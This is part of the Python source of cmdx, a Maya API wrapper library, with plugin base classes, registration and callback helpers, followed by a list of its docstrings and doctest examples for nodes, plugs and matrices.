cls.log = logging.getLogger(cls.__name__)
return super(MetaNode, cls).__init__(*args, **kwargs)
@add_metaclass(MetaNode)
class DgNode(om.MPxNode):
"""Abstract baseclass for a Maya DG node
Attributes:
name (str): Name used in e.g. cmds.createNode
id (int): Unique ID from Autodesk (see Ids above)
version (tuple, optional): Optional version number for plug-in node
attributes (tuple, optional): Attributes of node
defaults (dict, optional): Dictionary of default values
"""
typeid = TypeId(StartId)
name = "defaultNode"
version = (0, 0)
attributes = list()
affects = list()
ranges = dict()
defaults = {}
@classmethod
def postInitialize(cls):
pass
@add_metaclass(MetaNode)
class SurfaceShape(om.MPxSurfaceShape):
"""Abstract baseclass for a Maya shape
Attributes:
name (str): Name used in e.g. cmds.createNode
id (int): Unique ID from Autodesk (see Ids above)
version (tuple, optional): Optional version number for plug-in node
attributes (tuple, optional): Attributes of node
defaults (dict, optional): Dictionary of default values
"""
typeid = TypeId(StartId)
classification = "drawdb/geometry/custom"
name = "defaultNode"
version = (0, 0)
attributes = list()
affects = list()
ranges = dict()
defaults = {}
@classmethod
def postInitialize(cls):
pass
@classmethod
def uiCreator(cls):
pass
@add_metaclass(MetaNode)
class SurfaceShapeUI(omui.MPxSurfaceShapeUI):
"""Abstract baseclass for a Maya shape
Attributes:
name (str): Name used in e.g. cmds.createNode
id (int): Unique ID from Autodesk (see Ids above)
version (tuple, optional): Optional version number for plug-in node
attributes (tuple, optional): Attributes of node
defaults (dict, optional): Dictionary of default values
"""
typeid = TypeId(StartId)
classification = "drawdb/geometry/custom"
name = "defaultNode"
version = (0, 0)
attributes = list()
affects = list()
ranges = dict()
defaults = {}
@classmethod
def postInitialize(cls):
pass
@add_metaclass(MetaNode)
class LocatorNode(omui.MPxLocatorNode):
"""Abstract baseclass for a Maya locator
Attributes:
name (str): Name used in e.g. cmds.createNode
id (int): Unique ID from Autodesk (see Ids above)
version (tuple, optional): Optional version number for plug-in node
attributes (tuple, optional): Attributes of node
defaults (dict, optional): Dictionary of default values
"""
name = "defaultNode"
typeid = TypeId(StartId)
classification = "drawdb/geometry/custom"
version = (0, 0)
attributes = list()
affects = list()
ranges = dict()
defaults = {}
@classmethod
def postInitialize(cls):
pass
def initialize2(Plugin):
def _nodeInit():
nameToAttr = {}
for attr in Plugin.attributes:
mattr = attr.create(Plugin)
Plugin.addAttribute(mattr)
nameToAttr[attr["name"]] = mattr
for src, dst in Plugin.affects:
log.debug("'%s' affects '%s'" % (src, dst))
Plugin.attributeAffects(nameToAttr[src], nameToAttr[dst])
def _nodeCreator():
return Plugin()
def initializePlugin(obj):
version = ".".join(map(str, Plugin.version))
plugin = om.MFnPlugin(obj, "Cmdx", version, "Any")
try:
if issubclass(Plugin, LocatorNode):
plugin.registerNode(Plugin.name,
Plugin.typeid,
_nodeCreator,
_nodeInit,
om.MPxNode.kLocatorNode,
Plugin.classification)
elif issubclass(Plugin, DgNode):
plugin.registerNode(Plugin.name,
Plugin.typeid,
_nodeCreator,
_nodeInit)
elif issubclass(Plugin, SurfaceShape):
plugin.registerShape(Plugin.name,
Plugin.typeid,
_nodeCreator,
_nodeInit,
Plugin.uiCreator,
Plugin.classification)
else:
raise TypeError("Unsupported subclass: '%s'" % Plugin)
except Exception:
raise
else:
# Maintain reference to original class
InstalledPlugins[Plugin.name] = Plugin
Plugin.postInitialize()
return initializePlugin
def uninitialize2(Plugin):
def uninitializePlugin(obj):
om.MFnPlugin(obj).deregisterNode(Plugin.typeid)
return uninitializePlugin
# Plugins written with Maya Python API 1.0
class MPxManipContainer1(ompx1.MPxManipContainer):
name = "defaultManip"
version = (0, 0)
ownerid = om1.MTypeId(StartId)
typeid = om1.MTypeId(StartId)
def initializeManipulator1(Manipulator):
def _manipulatorCreator():
return ompx1.asMPxPtr(Manipulator())
def _manipulatorInit():
ompx1.MPxManipContainer.addToManipConnectTable(Manipulator.ownerid)
ompx1.MPxManipContainer.initialize()
def initializePlugin(obj):
version = ".".join(map(str, Manipulator.version))
plugin = ompx1.MFnPlugin(obj, "Cmdx", version, "Any")
# NOTE(marcus): The name *must* end with Manip
# See https://download.autodesk.com/us/maya/2011help
# /API/class_m_px_manip_container.html
# #e95527ff30ae53c8ae0419a1abde8b0c
assert Manipulator.name.endswith("Manip"), (
"Manipulator '%s' must have the name of a plug-in, "
"and end with 'Manip'"
)
plugin.registerNode(
Manipulator.name,
Manipulator.typeid,
_manipulatorCreator,
_manipulatorInit,
ompx1.MPxNode.kManipContainer
)
return initializePlugin
def uninitializeManipulator1(Manipulator):
def uninitializePlugin(obj):
ompx1.MFnPlugin(obj).deregisterNode(Manipulator.typeid)
return uninitializePlugin
def findPlugin(name):
"""Find the original class of a plug-in by `name`"""
try:
return InstalledPlugins[name]
except KeyError:
raise ExistError("'%s' is not a recognised plug-in" % name)
# --------------------------
#
# Callback Manager
#
# --------------------------
class Callback(object):
"""A Maya callback"""
log = logging.getLogger("cmdx.Callback")
def __init__(self, name, installer, args, api=2, help="", parent=None):
self._id = None
self._args = args
self._name = name
self._installer = installer
self._help = help
# Callbacks are all uninstalled using the same function
# relative either API 1.0 or 2.0
self._uninstaller = {
1: om1.MMessage.removeCallback,
2: om.MMessage.removeCallback
}[api]
def __del__(self):
self.deactivate()
def name(self):
return self._name
def help(self):
return self._help
def is_active(self):
return self._id is not None
def activate(self):
self.log.debug("Activating callback '%s'.." % self._name)
if self.is_active():
self.log.debug("%s already active, ignoring" % self._name)
return
self._id = self._installer(*self._args)
def deactivate(self):
self.log.debug("Deactivating callback '%s'.." % self._name)
if self.is_active():
self._uninstaller(self._id)
self._id = None
class CallbackGroup(list):
"""Multiple callbacks rolled into one"""
def __init__(self, name, callbacks, parent=None):
self._name = name
self[:] = callbacks
def name(self):
return self._name
def add(self, name, installer, args, api=2):
"""Convenience method for .append(Callback())"""
callback = Callback(name, installer, args, api)
self.append(callback)
def activate(self):
for callback in self._callbacks:
callback.activate()
def deactivate(self):
for callback in self._callbacks:
callback.deactivate()
# ----------------------
#
# Cache Manager
#
# ----------------------
class Cache(object):
def __init__(self):
self._values = {}
def clear(self, node=None):
pass
def read(self, node, attr, time):
pass
def transform(self, node):
pass
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
| cmdx.py | 154,791 | Maya's MBoundingBox
Returned in place of an actual plug
A Maya callback
Multiple callbacks rolled into one
Modifier for DG nodes
Modifier for DAG nodes
Example:
>>> with DagModifier() as mod:
... node1 = mod.createNode("transform")
... node2 = mod.createNode("transform", parent=node1)
... mod.setAttr(node1["translate"], (1, 2, 3))
... mod.connect(node1 + ".translate", node2 + ".translate")
...
>>> getAttr(node1 + ".translateX")
1.0
>>> node2["translate"][0]
1.0
>>> node2["translate"][1]
2.0
>>> with DagModifier() as mod:
... node1 = mod.createNode("transform")
... node2 = mod.createNode("transform", parent=node1)
... node1["translate"] = (5, 6, 7)
... node1["translate"] >> node2["translate"]
...
>>> node2["translate"][0]
5.0
>>> node2["translate"][1]
6.0
Example, without context manager:
>>> mod = DagModifier()
>>> parent = mod.createNode("transform")
>>> shape = mod.createNode("transform", parent=parent)
>>> mod.connect(parent["tz"], shape["tz"])
>>> mod.setAttr(parent["sx"], 2.0)
>>> parent["tx"] >> shape["ty"]
>>> parent["tx"] = 5.1
>>> round(shape["ty"], 1) # Not yet created nor connected
0.0
>>> mod.doIt()
>>> round(shape["ty"], 1)
5.1
>>> round(parent["sx"])
2.0
Duplicate names are resolved, even though nodes haven't yet been created:
>>> _ = cmds.file(new=True, force=True)
>>> with DagModifier() as mod:
... node = mod.createNode("transform", name="NotUnique")
... node1 = mod.createNode("transform", name="NotUnique")
... node2 = mod.createNode("transform", name="NotUnique")
...
>>> node.name() == "NotUnique"
True
>>> node1.name() == "NotUnique1"
True
>>> node2.name() == "NotUnique2"
True
Deletion works too
>>> _ = cmds.file(new=True, force=True)
>>> mod = DagModifier()
>>> parent = mod.createNode("transform", name="myParent")
>>> child = mod.createNode("transform", name="myChild", parent=parent)
>>> mod.doIt()
>>> "myParent" in cmds.ls()
True
>>> "myChild" in cmds.ls()
True
>>> parent.child().name()
u'myChild'
>>> mod = DagModifier()
>>> _ = mod.delete(child)
>>> mod.doIt()
>>> parent.child() is None
True
>>> "myChild" in cmds.ls()
False
A Maya DAG node
The difference between this and Node is that a DagNode
can have one or more children and one parent (multiple
parents not supported).
Example:
>>> _ = cmds.file(new=True, force=True)
>>> parent = createNode("transform")
>>> child = createNode("transform", parent=parent)
>>> child.parent() == parent
True
>>> next(parent.children()) == child
True
>>> parent.child() == child
True
>>> sibling = createNode("transform", parent=parent)
>>> child.sibling() == sibling
True
>>> shape = createNode("mesh", parent=child)
>>> child.shape() == shape
True
>>> shape.parent() == child
True
Abstract baseclass for a Maya DG node
Attributes:
name (str): Name used in e.g. cmds.createNode
id (int): Unique ID from Autodesk (see Ids above)
version (tuple, optional): Optional version number for plug-in node
attributes (tuple, optional): Attributes of node
defaults (dict, optional): Dictionary of default values
Visual divider in channel box
Abstract baseclass for a Maya locator
Attributes:
name (str): Name used in e.g. cmds.createNode
id (int): Unique ID from Autodesk (see Ids above)
version (tuple, optional): Optional version number for plug-in node
attributes (tuple, optional): Attributes of node
defaults (dict, optional): Dictionary of default values
A Maya dependency node
Example:
>>> _ = cmds.file(new=True, force=True)
>>> decompose = createNode("decomposeMatrix", name="decompose")
>>> str(decompose)
'decompose'
>>> alias = encode(decompose.name())
>>> decompose == alias
True
>>> transform = createNode("transform")
>>> transform["tx"] = 5
>>> transform["worldMatrix"][0] >> decompose["inputMatrix"]
>>> decompose["outputTranslate"]
(5.0, 0.0, 0.0)
Support set-type operations on Maya sets
Caveats
1. MFnSet was introduced in Maya 2016, this class backports
that behaviour for Maya 2015 SP3
2. Adding a DAG node as a DG node persists its function set
such that when you query it, it'll return the name rather
than the path.
Therefore, when adding a node to an object set, it's important
that it is added either a DAG or DG node depending on what it it.
This class manages this automatically.
Maya's MPoint
Maya's MQuaternion
Example:
>>> q = Quaternion(0, 0, 0, 1)
>>> v = Vector(1, 2, 3)
>>> isinstance(q * v, Vector)
True
Re-use previous instances of Node
Cost: 14 microseconds
This enables persistent state of each node, even when
a node is discovered at a later time, such as via
:func:`DagNode.parent()` or :func:`DagNode.descendents()`
Arguments:
mobject (MObject): Maya API object to wrap
exists (bool, optional): Whether or not to search for
an existing Python instance of this node
Example:
>>> nodeA = createNode("transform", name="myNode")
>>> nodeB = createNode("transform", parent=nodeA)
>>> encode("|myNode") is nodeA
True
>>> nodeB.parent() is nodeA
True
Abstract baseclass for a Maya shape
Attributes:
name (str): Name used in e.g. cmds.createNode
id (int): Unique ID from Autodesk (see Ids above)
version (tuple, optional): Optional version number for plug-in node
attributes (tuple, optional): Attributes of node
defaults (dict, optional): Dictionary of default values
Abstract baseclass for a Maya shape
Attributes:
name (str): Name used in e.g. cmds.createNode
id (int): Unique ID from Autodesk (see Ids above)
version (tuple, optional): Optional version number for plug-in node
attributes (tuple, optional): Attributes of node
defaults (dict, optional): Dictionary of default values
A more readable version of Maya's MTransformationMatrix
Added:
- Takes tuples/lists in place of MVector and other native types
- Support for multiplication
- Support for getting individual axes
- Support for direct access to the quaternion
Arguments:
matrix (Matrix, TransformationMatrix, optional): Original constructor
translate (tuple, Vector, optional): Initial translate value
rotate (tuple, Vector, optional): Initial rotate value
scale (tuple, Vector, optional): Initial scale value
Maya's MVector
Example:
>>> vec = Vector(1, 0, 0)
>>> vec * Vector(0, 1, 0) # Dot product
0.0
>>> vec ^ Vector(0, 1, 0) # Cross product
maya.api.OpenMaya.MVector(0, 0, 1)
Interactively edit an existing scenegraph with support for undo/redo
Arguments:
undoable (bool, optional): Put undoIt on the undo queue
interesting (bool, optional): New nodes should appear
in the channelbox
debug (bool, optional): Include additional debug data,
at the expense of performance
atomic (bool, optional): Automatically rollback changes on failure
template (str, optional): Automatically name new nodes using
this template
Facilitate use of isinstance(space, _Space)
Facilitate use of isinstance(space, _Type)
A Maya unit, for unit-attributes such as Angle and Distance
Because the resulting classes are subclasses of `int`, there
is virtually no run-time performance penalty to using it as
an integer. No additional Python is called, most notably when
passing the integer class to the Maya C++ binding (which wouldn't
call our overridden methods anyway).
The added overhead to import time is neglible.
Tuple of points to MObject suitable for nurbsCurve-typed data
Arguments:
points (tuple): (x, y, z) tuples per point
degree (int, optional): Defaults to 1 for linear
form (int, optional): Defaults to MFnNurbsCurve.kOpen,
also available kClosed
Example:
Create a new nurbs curve like this.
>>> data = NurbsCurveData(
... points=(
... (0, 0, 0),
... (0, 1, 0),
... (0, 2, 0),
... ))
...
>>> parent = createNode("transform")
>>> shape = createNode("nurbsCurve", parent=parent)
>>> shape["cached"] = data
Unlike other time units, this can be modified by the user at run-time
Return absolute value of plug
Example:
>>> node = createNode("transform")
>>> node["tx"] = -10
>>> abs(node["tx"])
10.0
Support legacy + '.attr' behavior
Example:
>>> node = createNode("transform")
>>> getAttr(node + ".tx")
0.0
>>> delete(node)
Support legacy add string to plug
Note:
Adding to short name is faster, e.g. node["t"] + "x",
than adding to longName, e.g. node["translate"] + "X"
Example:
>>> node = createNode("transform")
>>> node["tx"] = 5
>>> node["translate"] + "X"
5.0
>>> node["t"] + "x"
5.0
>>> try:
... node["t"] + node["r"]
... except TypeError:
... error = True
...
>>> error
True
if plug:
Example:
>>> node = createNode("transform")
>>> node["tx"] = 10
>>> if node["tx"]:
... True
...
True
Native API 2.0 MMatrix does not support indexing
API 1.0 however *does*, except only for elements
and not rows. Screw both of those, indexing isn't hard.
Arguments:
item (int, tuple): 1 integer for row, 2 for element
Identity/default matrix:
[[1.0, 0.0, 0.0, 0.0]]
[[0.0, 1.0, 0.0, 0.0]]
[[0.0, 0.0, 1.0, 0.0]]
[[0.0, 0.0, 0.0, 1.0]]
Example:
>>> m = MatrixType()
>>> m(0, 0)
1.0
>>> m(0, 1)
0.0
>>> m(1, 1)
1.0
>>> m(2, 1)
0.0
>>> m(3, 3)
1.0
>>>
>>> m(0)
(1.0, 0.0, 0.0, 0.0)
Does the attribute `other` exist?
Python 2.x division
Example:
>>> node = createNode("transform")
>>> node["tx"] = 5
>>> node["ty"] = 2
>>> node["tx"] / node["ty"]
2.5
MObject supports this operator explicitly
Compare plug to `other`
Example:
>>> node = createNode("transform")
>>> node["visibility"] == True
True
>>> node["visibility"] == node["nodeState"]
False
>>> node["visibility"] != node["nodeState"]
True
Return plug as floating point value
Example:
>>> node = createNode("transform")
>>> float(node["visibility"])
1.0
Disconnect attribute via A // B
Example:
>>> nodeA = createNode("transform")
>>> nodeB = createNode("transform")
>>> nodeA["tx"] >> nodeB["tx"]
>>> nodeA["tx"] = 5
>>> nodeB["tx"] == 5
True
>>> nodeA["tx"] // nodeB["tx"]
>>> nodeA["tx"] = 0
>>> nodeB["tx"] == 5
True
Get plug from self
Arguments:
key (str, tuple): String lookup of attribute,
optionally pass tuple to include unit.
Example:
>>> node = createNode("transform")
>>> node["translate"] = (1, 1, 1)
>>> node["translate", Meters]
(0.01, 0.01, 0.01)
Read from child of array or compound plug
Arguments:
index (int): Logical index of plug (NOT physical, make note)
Example:
>>> _ = cmds.file(new=True, force=True)
>>> node = createNode("transform", name="mynode")
>>> node["translate"][0].read()
0.0
>>> node["visibility"][0]
Traceback (most recent call last):
...
TypeError: |mynode.visibility does not support indexing
>>> node["translate"][2] = 5.1
>>> node["translate"][2].read()
5.1
Support storing in set()
Support += operator, for .append()
Example:
>>> node = createNode("transform")
>>> node["myArray"] = Double(array=True)
>>> node["myArray"].append(1.0)
>>> node["myArray"].extend([2.0, 3.0])
>>> node["myArray"] += 5.1
>>> node["myArray"] += [1.1, 2.3, 999.0]
>>> node["myArray"][0]
1.0
>>> node["myArray"][6]
999.0
>>> node["myArray"][-1]
999.0
Initialise Node
Private members:
mobject (om.MObject): Wrap this MObject
fn (om.MFnDependencyNode): The corresponding function set
modifier (om.MDagModifier, optional): Operations are
deferred to this modifier.
destroyed (bool): Has this node been destroyed by Maya?
state (dict): Optional state for performance
A Maya plug
Arguments:
node (Node): Parent Node of plug
mplug (maya.api.OpenMaya.MPlug): Internal Maya plug
unit (int, optional): Unit with which to read plug
Context for evaluating the Maya DG
Extension of MDGContext to also accept time as a float. In Maya 2018
and above DGContext can also be used as a context manager.
Arguments:
time (float, om.MTime, optional): Time at which to evaluate context
Return plug as int
Example:
>>> node = createNode("transform")
>>> int(node["visibility"])
1
Iterate over value as a tuple
Example:
>>> node = createNode("transform")
>>> node["translate"] = (0, 1, 2)
>>> for index, axis in enumerate(node["translate"]):
... assert axis == float(index)
... assert isinstance(axis, Plug)
...
>>> a = createNode("transform")
>>> a["myArray"] = Message(array=True)
>>> b = createNode("transform")
>>> c = createNode("transform")
>>> a["myArray"][0] << b["message"]
>>> a["myArray"][1] << c["message"]
>>> a["myArray"][0] in list(a["myArray"])
True
>>> a["myArray"][1] in list(a["myArray"])
True
>>> for single in node["visibility"]:
... print(single)
...
True
>>> node = createNode("wtAddMatrix")
>>> node["wtMatrix"][0]["weightIn"] = 1.0
Support connecting attributes via A << B
Negate unary operator
Example:
>>> node = createNode("transform")
>>> node["visibility"] = 1
>>> -node["visibility"]
-1
Support for using name of assignment
Example:
node["thisName"] = cmdx.Double()
In this example, the attribute isn't given a `name`
Instead, the name is inferred from where it is assigned.
Avoid repr depicting the full contents of this dict
Support connecting attributes via A >> B
Support item assignment of new attributes or values
Example:
>>> _ = cmds.file(new=True, force=True)
>>> node = createNode("transform", name="myNode")
>>> node["myAttr"] = Double(default=1.0)
>>> node["myAttr"] == 1.0
True
>>> node["rotateX", Degrees] = 1.0
>>> node["rotateX"] = Degrees(1)
>>> node["rotateX", Degrees]
1.0
>>> node["myDist"] = Distance()
>>> node["myDist"] = node["translateX"]
>>> node["myDist", Centimeters] = node["translateX", Meters]
>>> round(node["rotateX", Radians], 3)
0.017
>>> node["myDist"] = Distance()
Traceback (most recent call last):
...
ExistError: myDist
>>> node["notExist"] = 5
Traceback (most recent call last):
...
ExistError: |myNode.notExist
>>> delete(node)
Write to child of array or compound plug
Example:
>>> node = createNode("transform")
>>> node["translate"][0] = 5
>>> node["tx"]
5.0
Return value as str
Example:
>>> node = createNode("transform")
>>> str(node["tx"])
'0.0'
Float division, e.g. self / other
Convert `path` to Maya API 1.0 MObject
Arguments:
path (str): Absolute or relative path to DAG or DG node
Raises:
ExistError on `path` not existing
Convert `path` to Maya API 1.0 MObject
Arguments:
path (str): Absolute or relative path to DAG or DG node
Raises:
ExistError on `path` not existing
Find default value from plug, regardless of attribute type
Convert native `plug` to Python type
Arguments:
plug (om.MPlug): Native Maya plug
unit (int, optional): Return value in this unit, e.g. Meters
context (om.MDGContext, optional): Return value in this context
Convert `value` into a suitable equivalent for om.MDGModifier
Arguments:
value (object): Value of any type to write into modifier
plug (Plug): Plug within which to write value
mod (om.MDGModifier): Modifier to use for writing it
Pass value of `value` to `plug`
Arguments:
value (any): Instance of Python or Maya type
plug (Plug): Target plug to which value is applied
Add single `member` to set
Arguments:
member (cmdx.Node): Node to add
Convenience method for .append(Callback())
Add new attribute to `node`
Arguments:
node (Node): Add attribute to this node
longName (str): Name of resulting attribute
attributeType (str): Type of attribute, e.g. `string`
shortName (str, optional): Alternate name of attribute
enumName (str, optional): Options for an enum attribute
defaultValue (any, optional): Default value of attribute
Example:
>>> node = createNode("transform")
>>> addAttr(node, "myString", attributeType="string")
>>> addAttr(node, "myDouble", attributeType=Double)
Add a new dynamic attribute to node
Arguments:
attr (Plug): Add this attribute
Example:
>>> node = createNode("transform")
>>> attr = Double("myAttr", default=5.0)
>>> node.addAttr(attr)
>>> node["myAttr"] == 5.0
True
Add `child` to self
Arguments:
child (Node): Child to add
index (int, optional): Physical location in hierarchy,
defaults to cmdx.Last
Example:
>>> parent = createNode("transform")
>>> child = createNode("transform")
>>> parent.addChild(child)
Add metaclass to Python 2 and 3 class
Helper decorator, from six.py
Add `value` to end of self, which is an array
Arguments:
value (object): If value, create a new entry and append it.
If cmdx.Plug, create a new entry and connect it.
Example:
>>> _ = cmds.file(new=True, force=True)
>>> node = createNode("transform", name="appendTest")
>>> node["myArray"] = Double(array=True)
>>> node["myArray"].append(1.0)
>>> node["notArray"] = Double()
>>> node["notArray"].append(2.0)
Traceback (most recent call last):
...
TypeError: "|appendTest.notArray" was not an array attribute
Return plug as double (Python float)
Example:
>>> node = createNode("transform")
>>> node["translateX"] = 5.0
>>> node["translateX"].asDouble()
5.0
Return a given hashCode for `mobj`, without caching it
This can be helpful in case you wish to synchronise `cmdx`
with a third-party library or tool and wish to guarantee
that an identical algorithm is used.
Return a given hex string for `mobj`, without caching it
See docstring for :func:`asHash` for details
Return plug as MatrixType
Example:
>>> node1 = createNode("transform")
>>> node2 = createNode("transform", parent=node1)
>>> node1["translate"] = (0, 5, 0)
>>> node2["translate"] = (0, 5, 0)
>>> plug1 = node1["matrix"]
>>> plug2 = node2["worldMatrix"][0]
>>> mat1 = plug1.asMatrix()
>>> mat2 = plug2.asMatrix()
>>> mat = mat1 * mat2
>>> tm = TransformationMatrix(mat)
>>> list(tm.translation())
[0.0, 15.0, 0.0]
Return plug as TransformationMatrix
Example:
>>> node = createNode("transform")
>>> node["translateY"] = 12
>>> node["rotate"] = 1
>>> tm = node["matrix"].asTm()
>>> map(round, tm.rotation())
[1.0, 1.0, 1.0]
>>> list(tm.translation())
[0.0, 12.0, 0.0]
Return the top-level parent of node
Example:
>>> parent1 = createNode("transform")
>>> parent2 = createNode("transform")
>>> child = createNode("transform", parent=parent1)
>>> grandchild = createNode("transform", parent=child)
>>> child.assembly() == parent1
True
>>> parent2.assembly() == parent2
True
Return a cmdx.BoundingBox of this DAG node
Is the attribute visible in the Channel Box?
Return children of node
All returned children are transform nodes, as specified by the
`filter` argument. For shapes, use the :func:`shapes` method.
The `contains` argument only returns transform nodes containing
a shape of the type provided.
Arguments:
type (str, optional): Return only children that match this type
filter (int, optional): Return only children with this function set
contains (str, optional): Child must have a shape of this type
query (dict, optional): Limit output to nodes with these attributes
Example:
>>> _ = cmds.file(new=True, force=True)
>>> a = createNode("transform", "a")
>>> b = createNode("transform", "b", parent=a)
>>> c = createNode("transform", "c", parent=a)
>>> d = createNode("mesh", "d", parent=c)
>>> list(a.children()) == [b, c]
True
>>> a.child() == b
True
>>> c.child(type="mesh")
>>> c.child(type="mesh", filter=None) == d
True
>>> c.child(type=("mesh", "transform"), filter=None) == d
True
>>> a.child() == b
True
>>> a.child(contains="mesh") == c
True
>>> a.child(contains="nurbsCurve") is None
True
>>> b["myAttr"] = Double(default=5)
>>> a.child(query=["myAttr"]) == b
True
>>> a.child(query=["noExist"]) is None
True
>>> a.child(query={"myAttr": 5}) == b
True
>>> a.child(query={"myAttr": 1}) is None
True
Remove all reused nodes
Clear transient state
A node may cache previously queried values for performance
at the expense of memory. This method erases any cached
values, freeing up memory at the expense of performance.
Example:
>>> node = createNode("transform")
>>> node["translateX"] = 5
>>> node["translateX"]
5.0
>>> # Plug was reused
>>> node["translateX"]
5.0
>>> # Value was reused
>>> node.clear()
>>> node["translateX"]
5.0
>>> # Plug and value was recomputed
Remove all members from set
Return a clone of self
A "clone" assignes the .outMesh attribute of a mesh node
to the `.inMesh` of the resulting clone.
Supports:
- mesh
Arguments:
name (str, optional): Name of newly created clone
parent (DagNode, optional): Parent to newly cloned node
worldspace (bool, optional): Translate output to worldspace
Commit `undo` and `redo` to history
Arguments:
undo (func): Call this function on next undo
redo (func, optional): Like `undo`, for for redo
Connect `src` to `dst`
Arguments:
src (Plug): Source plug
dst (Plug): Destination plug
Example:
>>> src = createNode("transform")
>>> dst = createNode("transform")
>>> connectAttr(src + ".rotateX", dst + ".scaleY")
Return whether or not this attribute is connected (to anything)
Singular version of :func:`connections()`
Return first connection from :func:`connections()`
Yield plugs of node with a connection to any other plug
Arguments:
unit (int, optional): Return plug in this unit,
e.g. Meters or Radians
type (str, optional): Restrict output to nodes of this type,
e.g. "transform" or "mesh"
plugs (bool, optional): Return plugs, rather than nodes
Example:
>>> _ = cmds.file(new=True, force=True)
>>> a = createNode("transform", name="A")
>>> b = createNode("multDoubleLinear", name="B")
>>> a["ihi"] << b["ihi"]
>>> list(a.connections()) == [b]
True
>>> list(b.connections()) == [a]
True
>>> a.connection() == b
True
Yield plugs connected to self
Arguments:
type (int, optional): Only return nodes of this type
source (bool, optional): Return source plugs,
default is True
destination (bool, optional): Return destination plugs,
default is True
plugs (bool, optional): Return connected plugs instead of nodes
unit (int, optional): Return plug in this unit, e.g. Meters
Example:
>>> _ = cmds.file(new=True, force=True)
>>> a = createNode("transform", name="A")
>>> b = createNode("multDoubleLinear", name="B")
>>> a["ihi"] << b["ihi"]
>>> a["ihi"].connection() == b
True
>>> b["ihi"].connection() == a
True
>>> a["ihi"]
2
Create a new node
This function forms the basic building block
with which to create new nodes in Maya.
.. note:: Missing arguments `shared` and `skipSelect`
.. tip:: For additional performance, `type` may be given as an MTypeId
Arguments:
type (str): Type name of new node, e.g. "transform"
name (str, optional): Sets the name of the newly-created node
parent (Node, optional): Specifies the parent in the DAG under which
the new node belongs
Example:
>>> node = createNode("transform") # Type as string
>>> node = createNode(tTransform) # Type as ID
Create a NURBS curve from a series of points
Arguments:
parent (DagNode): Parent to resulting shape node
points (list): One tuples per point, with 3 floats each
degree (int, optional): Degree of curve, 1 is linear
form (int, optional): Whether to close the curve or not
Example:
>>> parent = createNode("transform")
>>> shape = curve(parent, [
... (0, 0, 0),
... (0, 1, 0),
... (0, 2, 0),
... ])
...
Return a om.MDagPath for this node
Example:
>>> _ = cmds.file(new=True, force=True)
>>> parent = createNode("transform", name="Parent")
>>> child = createNode("transform", name="Child", parent=parent)
>>> path = child.dagPath()
>>> str(path)
'Child'
>>> str(path.pop())
'Parent'
Special handling for data stored in the instance
Normally, the initialisation of data could happen in the __init__,
but for some reason the postConstructor of a custom plug-in calls
__init__ twice for every unique hex, which causes any data added
there to be wiped out once the postConstructor is done.
Convert cmdx Node to shortest unique path
This is the same as `node.shortestPath()`
To get an absolute path, use `node.path()`
Return default value of plug
Return one of three available values
Resolution order:
1. Argument
2. Node default (from cls.defaults)
3. Attribute default
Delete `attr` from node
Arguments:
attr (Plug): Attribute to remove
Example:
>>> node = createNode("transform")
>>> node["myAttr"] = Double()
>>> node.deleteAttr("myAttr")
>>> node.hasAttr("myAttr")
False
Singular version of :func:`descendents()`
A recursive, depth-first search.
.. code-block:: python
a
|
b---d
| |
c e
Example:
>>> _ = cmds.file(new=True, force=True)
>>> a = createNode("transform", "a")
>>> b = createNode("transform", "b", parent=a)
>>> c = createNode("transform", "c", parent=b)
>>> d = createNode("transform", "d", parent=b)
>>> e = createNode("transform", "e", parent=d)
>>> a.descendent() == a.child()
True
>>> list(a.descendents()) == [b, c, d, e]
True
>>> f = createNode("mesh", "f", parent=e)
>>> list(a.descendents(type="mesh")) == [f]
True
Return the first descendent
Return hierarchy of objects in set
Faster and more efficient dependency graph traversal
Requires Maya 2017+
Example:
>>> grandparent = createNode("transform")
>>> parent = createNode("transform", parent=grandparent)
>>> child = createNode("transform", parent=parent)
>>> mesh = createNode("mesh", parent=child)
>>> it = grandparent.descendents(type=tMesh)
>>> next(it) == mesh
True
>>> next(it)
Traceback (most recent call last):
...
StopIteration
Recursive, depth-first search; compliant with MItDag of 2017+
Example:
>>> grandparent = createNode("transform")
>>> parent = createNode("transform", parent=grandparent)
>>> child = createNode("transform", parent=parent)
>>> mesh = createNode("mesh", parent=child)
>>> it = grandparent.descendents(type=tMesh)
>>> next(it) == mesh
True
>>> next(it)
Traceback (most recent call last):
...
StopIteration
Disconnect self from `other`
Arguments:
other (Plug, optional): If none is provided, disconnect everything
Example:
>>> node1 = createNode("transform")
>>> node2 = createNode("transform")
>>> node2["tx"].connection() is None
True
>>> node2["ty"].connection() is None
True
>>>
>>> node2["tx"] << node1["tx"]
>>> node2["ty"] << node1["ty"]
>>> node2["ty"].connection() is None
False
>>> node2["tx"].connection() is None
False
>>>
>>> node2["tx"].disconnect(node1["tx"])
>>> node2["ty"].disconnect()
>>> node2["tx"].connection() is None
True
>>> node2["ty"].connection() is None
True
Disconnect `a` from `b`
Arguments:
a (Plug): Starting point of a connection
b (Plug, optional): End point of a connection, defaults to all
source (bool, optional): Disconnect b, if it is a source
source (bool, optional): Disconnect b, if it is a destination
Normally, Maya only performs a disconnect if the
connection is incoming. Bidirectional
disconnect(A, B) => OK
__________ _________
| | | |
| nodeA o---->o nodeB |
|__________| |_________|
disconnect(B, A) => NO
__________ _________
| | | |
| nodeA o---->o nodeB |
|__________| |_________|
Return dictionary of all attributes
Example:
>>> import json
>>> _ = cmds.file(new=True, force=True)
>>> node = createNode("choice")
>>> dump = node.dump()
>>> isinstance(dump, dict)
True
>>> dump["choice1.caching"]
False
Return a JSON compatible dictionary of all attributes
Return a duplicate of self
Convert relative or absolute `path` to cmdx Node
Fastest conversion from absolute path to Node
Arguments:
path (str): Absolute or relative path to DAG or DG node
The node exists in both memory *and* scene
Example:
>>> node = createNode("joint")
>>> node.exists
True
>>> cmds.delete(str(node))
>>> node.exists
False
>>> node.destroyed
False
>>> _ = cmds.file(new=True, force=True)
>>> node.exists
False
>>> node.destroyed
True
Append multiple values to the end of an array
Arguments:
values (tuple): If values, create a new entry and append it.
If cmdx.Plug's, create a new entry and connect it.
Example:
>>> node = createNode("transform")
>>> node["myArray"] = Double(array=True)
>>> node["myArray"].extend([1.0, 2.0, 3.0])
